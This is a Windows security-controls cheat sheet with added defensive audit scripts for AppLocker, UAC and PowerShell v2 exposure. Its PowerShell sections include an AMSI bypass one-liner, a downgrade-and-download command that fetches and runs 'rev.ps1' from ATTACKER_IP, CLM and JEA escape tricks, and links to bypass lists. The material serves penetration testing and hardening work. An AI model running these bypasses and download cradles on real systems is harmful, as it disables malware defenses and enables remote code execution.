# Windows - Defenses

## Summary

* [AppLocker](#applocker)
* [User Account Control](#user-account-control)
* [DPAPI](#dpapi)
* [Powershell](#powershell)
  * [Anti Malware Scan Interface](#anti-malware-scan-interface)
  * [Just Enough Administration](#just-enough-administration)
  * [Constrained Language Mode](#constrained-language-mode)
  * [Script Block Logging](#script-block-logging)
* [Protected Process Light](#protected-process-light)
* [Credential Guard](#credential-guard)
* [Event Tracing for Windows](#event-tracing-for-windows)
* [Windows Defender Antivirus](#windows-defender-antivirus)
* [Windows Defender Application Control](#windows-defender-application-control)
* [Windows Defender Firewall](#windows-defender-firewall)
* [Windows Information Protection](#windows-information-protection)

## AppLocker

> AppLocker is a security feature in Microsoft Windows that gives administrators the ability to control which applications and files users are allowed to run on their systems. Rules can be based on criteria such as the file path, file publisher, or file hash, and can be applied to specific users or groups.
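As an added defender-side example (not part of the original page or of PayloadsAllTheThings), the following PowerShell script audits an AppLocker policy for the two weaknesses this section points at: rule collections that hold rules but are left in AuditOnly/NotConfigured, and Allow path rules broad enough to cover a user-writable directory such as `C:\Windows\Tasks` without an exception for it. It takes the XML that `Get-AppLockerPolicy -Effective -Xml` returns. The writable-directory list, the sample policy, the function names and the assumption that the Windows directory is `C:\Windows` are all constructed for the example.

```powershell
# Added example, not from PayloadsAllTheThings: audit an AppLocker policy (the
# XML that `Get-AppLockerPolicy -Effective -Xml` returns) for two weaknesses:
# rule collections that hold rules but are not enforced, and Allow path rules
# that cover a user-writable directory with no exception for it.
Import-Module AppLocker -ErrorAction SilentlyContinue   # built-in; only needed for the live call at the end

# Assumption: user-writable directories under an allowed root. C:\Windows\Tasks is
# the one this section names; extend the list for your environment.
$WritableDirs = @('C:\Windows\Tasks', 'C:\Windows\Temp')

function Expand-AppLockerPath {
    # Resolve the AppLocker path variables that map to fixed local locations.
    param([string]$Path)
    $root  = $env:SystemRoot                                     # e.g. C:\Windows
    $drive = [System.IO.Path]::GetPathRoot($root).TrimEnd('\')   # e.g. C:
    $Path = $Path -replace '%SYSTEM32%',     "$root\System32"
    $Path = $Path -replace '%WINDIR%',       $root
    $Path = $Path -replace '%OSDRIVE%',      $drive
    $Path = $Path -replace '%PROGRAMFILES%', $env:ProgramFiles
    return $Path
}

function Test-AppLockerPathCovers {
    # True when a file placed directly in $Directory would match $Pattern.
    # Probing with a child file name makes 'C:\Windows\*' and 'C:\Windows\Tasks\*'
    # both count as covering C:\Windows\Tasks; -like is case-insensitive.
    param([string]$Pattern, [string]$Directory)
    $probe = Join-Path $Directory 'probe.exe'
    return ($probe -like (Expand-AppLockerPath $Pattern))
}

function Get-AppLockerPolicyFinding {
    param([Parameter(Mandatory)][string]$PolicyXml)
    [xml]$doc = $PolicyXml
    $findings = @()
    foreach ($rc in @($doc.AppLockerPolicy.RuleCollection)) {
        if (-not $rc) { continue }
        $type = $rc.GetAttribute('Type'); $mode = $rc.GetAttribute('EnforcementMode')
        # AuditOnly / NotConfigured collections log but never block.
        if ($rc.HasChildNodes -and $mode -ne 'Enabled') {
            $findings += [pscustomobject]@{
                Collection = $type; Rule = '(collection)'
                Issue      = "EnforcementMode is '$mode': rules are not enforced"
            }
        }
        foreach ($rule in @($rc.FilePathRule)) {
            if (-not $rule -or $rule.GetAttribute('Action') -ne 'Allow') { continue }
            $conditions = @($rule.Conditions.FilePathCondition.Path)
            $exceptions = @($rule.Exceptions.FilePathCondition.Path)
            foreach ($dir in $WritableDirs) {
                $covering = @($conditions | Where-Object { $_ -and (Test-AppLockerPathCovers $_ $dir) })
                $excepted = @($exceptions | Where-Object { $_ -and (Test-AppLockerPathCovers $_ $dir) })
                if ($covering.Count -gt 0 -and $excepted.Count -eq 0) {
                    $findings += [pscustomobject]@{
                        Collection = $type; Rule = $rule.GetAttribute('Name')
                        Issue      = "Allow rule '$($covering -join ', ')' covers user-writable $dir with no exception"
                    }
                }
            }
        }
    }
    return $findings
}

# Constructed sample policy (not a real export) so the audit can be demonstrated
# without touching this host: an Exe collection in AuditOnly with the default
# "Windows folder" rule, and a Script collection that carves the writable
# directories out with exceptions. Expected: three findings, all for "Exe".
$SamplePolicy = @'
<AppLockerPolicy Version="1">
  <RuleCollection Type="Exe" EnforcementMode="AuditOnly">
    <FilePathRule Id="00000000-0000-0000-0000-000000000001" Name="All files located in the Windows folder" UserOrGroupSid="S-1-1-0" Action="Allow">
      <Conditions><FilePathCondition Path="%WINDIR%\*" /></Conditions>
    </FilePathRule>
  </RuleCollection>
  <RuleCollection Type="Script" EnforcementMode="Enabled">
    <FilePathRule Id="00000000-0000-0000-0000-000000000002" Name="Windows folder minus writable dirs" UserOrGroupSid="S-1-1-0" Action="Allow">
      <Conditions><FilePathCondition Path="%WINDIR%\*" /></Conditions>
      <Exceptions>
        <FilePathCondition Path="%WINDIR%\Tasks\*" />
        <FilePathCondition Path="%WINDIR%\Temp\*" />
      </Exceptions>
    </FilePathRule>
  </RuleCollection>
</AppLockerPolicy>
'@

Get-AppLockerPolicyFinding -PolicyXml $SamplePolicy | Format-Table -AutoSize

# Live audit of this host (AppLocker module, elevated session):
# Get-AppLockerPolicyFinding -PolicyXml (Get-AppLockerPolicy -Effective -Xml) | Format-Table -AutoSize
# AppLocker only enforces while the Application Identity service is running:
# (Get-Service AppIDSvc).Status
```

The Script collection in the sample shows the usual fix for the writable-directory problem: keep the broad `%WINDIR%\*` allow rule but add path exceptions for every directory under it that standard users can write to, and keep every collection you rely on in `Enabled` rather than `AuditOnly`.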
* Enumerate Local AppLocker Effective Policy

```powershell
PS C:\> Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
PS C:\> Get-AppLockerPolicy -Effective -Xml
Get-ChildItem -Path HKLM:\SOFTWARE\Policies\Microsoft\Windows\SrpV2\Exe # (Keys: Appx, Dll, Exe, Msi and Script)
```

* AppLocker Bypass
  * By default, `C:\Windows` is not blocked, and `C:\Windows\Tasks` is writable by any user
  * [api0cradle/UltimateAppLockerByPassList/Generic-AppLockerbypasses.md](https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/Generic-AppLockerbypasses.md)
  * [api0cradle/UltimateAppLockerByPassList/VerifiedAppLockerBypasses.md](https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/VerifiedAppLockerBypasses.md)
  * [api0cradle/UltimateAppLockerByPassList/DLL-Execution.md](https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/DLL-Execution.md)

## User Account Control

UAC stands for User Account Control. It is a security feature introduced by Microsoft in Windows Vista and present in all subsequent versions of Windows. UAC helps mitigate the impact of malware by asking for permission or an administrator's password before allowing changes to the system that could affect all users of the computer.
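As an added example (not from the original page or PayloadsAllTheThings), this PowerShell audit reads the registry values the checks in this section query with `REG QUERY`, plus `LocalAccountTokenFilterPolicy` and `PromptOnSecureDesktop`, and maps them to the descriptions in the section's table. A value that does not exist in the registry is treated as its documented default, which is the edge case `REG QUERY` alone does not make obvious. Function names are assumptions made for the example.

```powershell
# Added example, not from PayloadsAllTheThings: read and interpret the UAC
# registry values this section queries, plus LocalAccountTokenFilterPolicy,
# which the table uses. A value that does not exist is treated as its
# documented default. Run in an elevated PowerShell on the host being audited.
$UacKey = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'

function Get-UacValue {
    # Returns the DWORD stored under $UacKey, or $Default when the value is absent.
    param([string]$Name, [int]$Default)
    $item = Get-ItemProperty -Path $UacKey -Name $Name -ErrorAction SilentlyContinue
    if ($null -eq $item) { return $Default }
    return [int]$item.$Name
}

function Get-UacState {
    $enableLua   = Get-UacValue 'EnableLUA'                     1   # UAC on
    $tokenFilter = Get-UacValue 'LocalAccountTokenFilterPolicy' 0   # remote local admins get a filtered token
    $filterAdmin = Get-UacValue 'FilterAdministratorToken'      0   # built-in Administrator (RID 500) unfiltered
    $consent     = Get-UacValue 'ConsentPromptBehaviorAdmin'    5   # prompt for consent for non-Windows binaries
    $secureDesk  = Get-UacValue 'PromptOnSecureDesktop'         1   # prompts on the secure desktop

    # Rows of the table in this section, evaluated top to bottom.
    if     ($enableLua -eq 0)   { $posture = 'No UAC' }
    elseif ($tokenFilter -eq 1) { $posture = 'No UAC' }
    elseif ($filterAdmin -eq 0) { $posture = 'No UAC for RID 500' }
    else                        { $posture = 'UAC for Everyone' }

    # Documented meanings of ConsentPromptBehaviorAdmin.
    $consentMeaning = @{
        0 = 'elevate without prompting'
        1 = 'prompt for credentials on the secure desktop'
        2 = 'prompt for consent on the secure desktop'
        3 = 'prompt for credentials'
        4 = 'prompt for consent'
        5 = 'prompt for consent for non-Windows binaries (default)'
    }[$consent]
    if (-not $consentMeaning) { $consentMeaning = 'unrecognised value' }

    # Hardening commands for anything weaker than the defaults; EnableLUA needs a reboot.
    $fixes = @()
    if ($enableLua -ne 1)   { $fixes += "Set-ItemProperty -Path '$UacKey' -Name EnableLUA -Value 1 -Type DWord" }
    if ($tokenFilter -ne 0) { $fixes += "Set-ItemProperty -Path '$UacKey' -Name LocalAccountTokenFilterPolicy -Value 0 -Type DWord" }
    if ($filterAdmin -ne 1) { $fixes += "Set-ItemProperty -Path '$UacKey' -Name FilterAdministratorToken -Value 1 -Type DWord" }
    if ($consent -eq 0)     { $fixes += "Set-ItemProperty -Path '$UacKey' -Name ConsentPromptBehaviorAdmin -Value 2 -Type DWord" }
    if ($secureDesk -ne 1)  { $fixes += "Set-ItemProperty -Path '$UacKey' -Name PromptOnSecureDesktop -Value 1 -Type DWord" }

    [pscustomobject]@{
        EnableLUA                     = $enableLua
        LocalAccountTokenFilterPolicy = $tokenFilter
        FilterAdministratorToken      = $filterAdmin
        ConsentPromptBehaviorAdmin    = "$consent ($consentMeaning)"
        PromptOnSecureDesktop         = $secureDesk
        Posture                       = $posture
        RecommendedFixes              = $fixes
    }
}

Get-UacState | Format-List
```

The `RecommendedFixes` strings are printed rather than executed so the audit stays read-only; review them and apply them through Group Policy where the host is domain-joined, since a local registry change is overwritten at the next policy refresh.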
* Check if UAC is enabled

```ps1
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA
```

* Check UAC level

```ps1
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v FilterAdministratorToken
```

| EnableLUA | LocalAccountTokenFilterPolicy | FilterAdministratorToken | Description |
|---|---|---|---|
| 0 | / | / | No UAC |
| 1 | 1 | / | No UAC |
| 1 | 0 | 0 | No UAC for RID 500 |
| 1 | 0 | 1 | UAC for Everyone |

* UAC Bypass
  * [AutoElevated binary signed by Microsoft](https://www.elastic.co/guide/en/security/current/bypass-uac-via-sdclt.html) - `msconfig`, `sdclt.exe`, `eventvwr.exe`, etc.
  * [hfiref0x/UACME](https://github.com/hfiref0x/UACME) - Defeating Windows User Account Control

## DPAPI

Refer to [PayloadsAllTheThings/Windows - DPAPI.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20DPAPI.md)

## Powershell

### Anti Malware Scan Interface

> The Anti-Malware Scan Interface (AMSI) is a Windows API (Application Programming Interface) that provides a unified interface for applications and services to integrate with any anti-malware product installed on a system. The API allows anti-malware solutions to scan files and scripts at runtime, and provides a means for applications to request a scan of specific content.
More AMSI bypasses: [Windows - AMSI Bypass.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20AMSI%20Bypass.md)

```powershell
PS C:\> [Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils').GetField('am'+'siInitFailed','NonPu'+'blic,Static').SetValue($null,$true)
```

### Just Enough Administration

> Just Enough Administration (JEA) is a feature in Microsoft Windows Server that allows administrators to delegate specific administrative tasks to non-administrative users. JEA provides a secure and controlled way to grant limited, just-enough access to systems, while ensuring that the user cannot perform unintended actions or access sensitive information.

Breaking out of JEA:

* List available cmdlets: `Get-Command`
* Look for non-default cmdlets:

```ps1
Set-PSSessionConfiguration
Start-Process
New-Service
Add-Computer
```

### Constrained Language Mode

Check whether the current session is in constrained language mode: `$ExecutionContext.SessionState.LanguageMode`

* Bypass using an old PowerShell: PowerShell v2 doesn't support CLM.

```ps1
powershell.exe -version 2
powershell.exe -version 2 -ExecutionPolicy bypass
powershell.exe -v 2 -ep bypass -command "IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/rev.ps1')"
```

* Bypass when `__PSLockDownPolicy` is used: just put "System32" somewhere in the path.
```ps1
# Enable CLM from the environment
[Environment]::SetEnvironmentVariable('__PSLockdownPolicy', '4', 'Machine')
Get-ChildItem -Path Env:

# Create a check-mode.ps1 containing your "evil" powershell commands
$mode = $ExecutionContext.SessionState.LanguageMode
write-host $mode

# Simple bypass, execute inside a System32 folder
PS C:\> C:\Users\Public\check-mode.ps1
ConstrainedLanguage
PS C:\> C:\Users\Public\System32\check-mode.ps1
FullLanguage
```

* Bypass using COM: [xpn/COM_to_registry.ps1](https://gist.githubusercontent.com/xpn/1e9e879fab3e9ebfd236f5e4fdcfb7f1/raw/ceb39a9d5b0402f98e8d3d9723b0bd19a84ac23e/COM_to_registry.ps1)
* Bypass using your own PowerShell DLL: [p3nt4/PowerShdll](https://github.com/p3nt4/PowerShdll) & [iomoath/PowerShx](https://github.com/iomoath/PowerShx)

```ps1
rundll32 PowerShdll,main
```
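As an added example for the defender side of this section (not part of the original page or PayloadsAllTheThings), the following PowerShell script checks whether the PowerShell 2.0 engine that sidesteps CLM is still installed and actually startable, whether CLM on the host depends on the legacy `__PSLockdownPolicy` environment variable that the path trick above defeats, and scans the classic Windows PowerShell event log for engine starts that report `EngineVersion=2.0`. The function names, the 30-day window and the assumption of a Windows client SKU are mine.

```powershell
# Added example, not from PayloadsAllTheThings: detect and close the PowerShell
# v2 downgrade path and the weak __PSLockdownPolicy CLM switch discussed above.
# Run from an elevated Windows PowerShell 5.1 session.

function Get-PowerShellV2FeatureState {
    # Windows client: the v2 engine is an optional feature. On Windows Server
    # query Get-WindowsFeature PowerShell-V2 instead (assumption: client SKU here).
    $feature = Get-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2Root -ErrorAction SilentlyContinue
    if ($null -eq $feature) { return 'Unknown' }
    return [string]$feature.State
}

function Test-PowerShellV2Runnable {
    # The authoritative check: ask the v2 engine to report its own version.
    # When v2 has been removed, powershell.exe -Version 2 writes an error and
    # produces no output, so this returns $false.
    $out = & powershell.exe -NoProfile -NonInteractive -Version 2 -Command '$PSVersionTable.PSVersion.Major' 2>$null
    return (($out | Out-String).Trim() -eq '2')
}

function Get-ClmEnforcementState {
    # __PSLockdownPolicy is the legacy environment-variable switch; the section
    # above shows that any path containing "System32" escapes it. Supported CLM
    # enforcement comes from an AppLocker or WDAC policy, which PowerShell 5+ honours.
    $machineVar = [Environment]::GetEnvironmentVariable('__PSLockdownPolicy', 'Machine')
    [pscustomobject]@{
        LockdownPolicyEnvVar = if ($machineVar) { $machineVar } else { '(not set)' }
        CurrentLanguageMode  = $ExecutionContext.SessionState.LanguageMode
        Assessment           = if ($machineVar) { 'CLM relies on __PSLockdownPolicy: trivially bypassed, move to AppLocker/WDAC' } else { 'no env-var based CLM' }
    }
}

function Get-PowerShellV2EngineStart {
    param([int]$Days = 30)
    # Event ID 400 in the classic "Windows PowerShell" log fires on every engine
    # start and carries EngineVersion= and HostApplication= in its message.
    # Script block logging (4104) does not exist in v2, so this is the main
    # trace a downgrade leaves behind.
    $filter = @{ LogName = 'Windows PowerShell'; Id = 400; StartTime = (Get-Date).AddDays(-$Days) }
    $events = Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue
    foreach ($e in $events) {
        if ($e.Message -notmatch 'EngineVersion=2\.0') { continue }
        $hostApp = if ($e.Message -match 'HostApplication=([^\r\n]+)') { $Matches[1].Trim() } else { '' }
        [pscustomobject]@{ Time = $e.TimeCreated; HostApplication = $hostApp }
    }
}

Write-Host "PowerShell v2 feature : $(Get-PowerShellV2FeatureState)"
Write-Host "PowerShell v2 runnable: $(Test-PowerShellV2Runnable)"
Get-ClmEnforcementState | Format-List
Get-PowerShellV2EngineStart -Days 30 | Format-Table -AutoSize

# Remediation (client SKU): remove the v2 engine so '-Version 2' has nothing to start.
# Disable-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2Root
```

`Test-PowerShellV2Runnable` is the check worth trusting: the optional-feature state can read as disabled on an image where the engine binaries were nonetheless left behind, while a successful `-Version 2` start proves the downgrade path is open. Any `HostApplication` value the log scan returns that is not one of your own management tools is worth an investigation, because it is exactly the command line shown in the bypass list above.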